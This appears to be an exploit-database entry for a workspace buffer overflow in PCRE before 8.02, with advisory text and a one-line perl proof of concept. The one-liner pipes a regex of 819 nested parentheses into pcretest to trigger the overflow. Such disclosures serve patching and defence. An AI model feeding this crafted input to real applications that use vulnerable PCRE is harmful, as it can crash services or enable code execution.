PCRE 6.2 - Regular Expression Compiling Workspace Buffer Overflow
Author: Michael Santos
type: remote
platform: linux
port:
date_added: 2010-05-06
date_updated: 2014-07-02
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/39974/info
PCRE is prone to a buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of an application using the PCRE library. Failed attacks may result in denial-of-service conditions.
Versions prior to PCRE 8.02 are vulnerable; applications which use the PCRE library may also be affected.
perl -e 'print "/","("x819, ")"x819, "/"' | pcretest